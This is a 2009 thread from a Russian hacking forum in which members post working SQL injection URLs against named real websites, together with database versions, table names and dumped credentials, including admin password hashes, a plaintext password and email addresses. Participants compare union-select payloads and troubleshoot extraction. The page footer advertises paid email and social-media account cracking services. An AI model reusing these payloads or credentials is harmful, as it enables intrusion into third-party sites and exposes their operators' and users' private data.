Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Важно: выкладываем примеры sql injection Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / WEB сайтов RSS подписка на сообщения с форума Subscribe Модераторы: RenGO, Bb0y, B3JIoMep, BRUNOTTI, Virous, xssmailcom
Технологии взлома сайтов - xss, sql injection. Для сообщений "взломайте мне сайт" есть форум "Предложения работы".

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Страницы сообщения: [1] [2] [3] [4] [5] [6] [7] [8] Просмотров - 119046
Важно: выкладываем примеры sql injection
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
Bb0y



Moderator
Elite
# | Сообщение добавлено 14.04.2009 15:11:09
Отредактировано 15.11.2009 00:09:09 by Bboy
Ссилки вида lol.php?id=15' не принимаются. При выкладывании прошу указывать:
1.Ссыль с подобранным числом колонок
2.Версию БД
3.Таблицы с юзерами/админом и/или другой полезной информацией, если таковые найдены.
Каждому выложевшему нажму 'спс' лично)
начну с себя:
a)http://www.djilan.com.br/news.php?id=-142+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+limit+39,1
б)MySQL 5.0.45-log
в)forum_users
&
а)http://www.wenatcheecares.org/user.php?id=-14+union+select+1,2,3,4,concat_ws(0x3a,user_nickname,user_passwd),6,7,8,9,10,11+from+users
б)MySQL 5.0.75-community-log
в)users
&
а)http://www.foresightdesign.org/events/detail.php?id=-2+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
б)MySQL 4.1.22-max-log
в)не искал еше
====================================
прошу...)
з.Ы. Плз не надо маятцо перекопированием скуль с баз ачата и т.Д. И т.П.

 

 

Добавлено через: 10 минут 18 секунд
 
==============================================
a)http://xn--b1aecbgci6b0a.su/news.php?id=-119+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+limit+16,1
б)MySQL 5.0.22
в)admsys_users
 

Добавлено через: 1 час 46 минут 46 секунд
 
а)http://www.superpovar.ru/art.php?id=-15+union+select+1,2,version(),4
б)MySQL 5.0.45-community-log
в)phpbb_users
 

 
Tix. Помним, скорбим.
Сказать спасибо Ответить Цитировать

Dimionx




Novice
# | Сообщение добавлено 14.04.2009 18:05:53
1 - http://www.domesticsupplies.co.uk/product.php?id=-17+union+select+1,2,3,4,5
2 - MySQL 5.0.45
3 - http://www.domesticsupplies.co.uk/product.php?id=-17+union+select+concat_ws(0x3a,username,password),2,3,4,5+from+vme_cms_users
admin:528d29f4efd0516f1bf06f2082725af4
Сказать спасибо Ответить Цитировать

Bb0y



Moderator
Elite
# | Сообщение добавлено 14.04.2009 21:07:17
=====================
Спасибо DimionX)
а у мну еше тут есть:
а)http://www.alsystems.com/newsletter.php?id=-11+union+select+1,2,version(),4,5,6,7,8,9
б)MySQL 5.0.67-community
в)admin
================================
admin:797b8d22ad55ab35d47fc4f9c3b3b6ef
================================
 


 
Tix. Помним, скорбим.
Сказать спасибо Ответить Цитировать

M.W.N.N.


Gold Member
# | Сообщение добавлено 19.04.2009 17:54:38
Отредактировано 19.04.2009 19:50:26 by M.W.N.N.
Text
http://br-production.fr/newsid.php?id=16+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
version():4.0.27-max-log
database():db181593403
user():dbo181593403@212.227.127.180
__
Text
http://www.vancouver-ecodensity.ca/content.php?id=42+union+select+1,2,unhex(hex(conca  t_ws(0x3a,version(),database(),user()))),4,5,6,7,8  ,9,10,11,12,13,14,15,16+limit+1,1/*

version(): 4.1.14-log
databse():fixate_eco
user():fixate_eco@lsh413.van.ca.siteprotect.com
__
Text
http://www.indiancinemas.com/News-39/BR+Chopra+an+end+of+an+era.html?newsid=363&linkid=39+union+select+concat_ws(0x3a,version(),database(),user())+limit+1,1
version():5.0.67-COMMUNITY
database():INDIANCINEMAS_COMDB
user():INDIANCINEMAS_IN@LOCALHOST
__
<<МЖД>>
Text
http://www.mtz.mn/achaa/index.php?moduls=203&id=11+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user())/*
version():5.0.27
database():mtzAKA
user():mtzAKA@localhost
 
Text
http://www.mtz.mn/achaa/index.php?moduls=203&id=11+union+select+1,2,3,4,5,concat_ws(0x3a,table_name,column_name)+from+information_schema.columns/*

Text
http://www.mtz.mn/achaa/index.php?moduls=203&id=11+union+select+1,2,3,4,5,concat_ws(0x3a,id,user,password,email)+from+login/*

133:m_alba:mtzaka:m@mtz.mn
 
javascript:/*--&gt;&lt;/marquee&gt;&lt;/script&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;&quot;&gt;
Сказать спасибо Ответить Цитировать

aka_google




Novice
# | Сообщение добавлено 19.04.2009 21:20:31
Отредактировано 19.04.2009 21:36:32 by aka_google
Вообще там 2 таблицы я нашёл интересные :
user_login
userlogin
вывод в (title)
 
Text
http://www.indiancinemas.com/News-39/BR+Chopra+an+end+of+an+era.html?newsid=363+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(password,username),0x71),0x71),3,4,5,6,7+FROM+user_login+LIMIT+1,1--
Сказать спасибо Ответить Цитировать

M.W.N.N.


Gold Member
# | Сообщение добавлено 19.04.2009 21:30:22
Заключайте ссылки в тег [CОDE]
Если находите нормальные таблици то оформляйте как ссылки
 
javascript:/*--&gt;&lt;/marquee&gt;&lt;/script&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;&quot;&gt;
Сказать спасибо Ответить Цитировать

aka_google




Novice
# | Сообщение добавлено 19.04.2009 22:59:27
Отредактировано 19.04.2009 23:01:16 by aka_google
Вот ещё бьюсь несколько часов
Text
http://www.kadis.net/newstext.phtml?id=35440+order+by+37--
как видим полей 37 на сайте есть форум таблица phpbb_users : в ней
username
user_password
составим запрос
Text
http://www.kadis.net/newstext.phtml?id=35440+AND+ASCII(SUBSTRING((select+concat(username,0x3a,user_password)+from+phpbb_users+limit+1,1+--+
выборки почемуто нет ,с лимитом эксперементировал , да читаемые поля 1,2,5,8,10,21,22,24,25   а вот вывода нет какая версия
Text
http://www.kadis.net/newstext.phtml?id=35440+union+select+1,Version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+limit+1,1--
Сказать спасибо Ответить Цитировать

Bb0y



Moderator
Elite
# | Сообщение добавлено 19.04.2009 23:11:36
У мну тож было, что в списке таблы есть, а на деле в них просто не пускает. Мускул выдает ошибку
 

Добавлено через: 9 минут 38 секунд
 
К примеру:
а)
http://www.fikomed.ru/base.php?id=-11+union+select+1,2,3,concat_ws(0x3a,table_name,column_name)+from+information_schema.columns&lev=0
полей 4, принтит 4е
б)5.0.67
в)userlist
 
http://www.fikomed.ru/base.php?id=-11+union+select+1,2,3,concat_ws(0x3a,table_name,column_name)+from+information_schema.columns&lev=0
 

 
Tix. Помним, скорбим.
Сказать спасибо Ответить Цитировать

aka_google




Novice
# | Сообщение добавлено 20.04.2009 00:27:10
Отредактировано 20.04.2009 01:13:49 by aka_google
Bboy , по поводу http://www.fikomed.ru в userlist 1- name , 2- pass
вот ещё инжект
Text
http://www.parkui.ru/news.php?id=352+UNION+SELECT+1,2,Version(),4,5,6,7,8,9,10+LIMIT+1,1/*

Database Version: 5.0.45
Database name: parkui
User name: parkui@www.multiline.ru
 
Text
http://www.parkui.ru/forum/
eb0a191797624dd3a48fa681d3061212:admin Passwd: - master
и ещё 5.0.45 ветка
Text
http://www.oborudunion.ru/news.php?id=4240+UNION+SELECT+user(),2,Version(),4,database(),6,7,8,9--
http://www.oborudunion.ru/admin
Сказать спасибо Ответить Цитировать

Bb0y



Moderator
Elite
# | Сообщение добавлено 20.04.2009 00:38:19
2aka_google, я знаю что там колонки name & pass, что ты хотел сказать этим? При составлении запроса к таблице userlist с name & pass вывода нет, можеш проверить
 

Добавлено через: 4 минуты 40 секунд
 
id_user ишо
 
Tix. Помним, скорбим.
Сказать спасибо Ответить Цитировать

Страницы сообщения: [1] [2] [3] [4] [5] [6] [7] [8]
Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Ищу работу » Re: Взлом емейлов, вконтакте, одноклассники
  • Разное / Ищу работу » Re: Взлом почты mail.ru, yandex.ru, rambler, gmail
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом ВКонтакте на заказ. Взлом почты на заказ.
  • Интернет / Разное » SOCKS 4/5, HTTPS прокси сервис - proxybuy
  • Программирование / WEB Design » Уроки по JavaScript для начинающих
  • Разное / Ищу работу » Re: Прогон 7ым XRumerоm по форумам, блогам, гостевым. ru и e...
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Предложения работы » Нужен способ заработка, майнинга

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}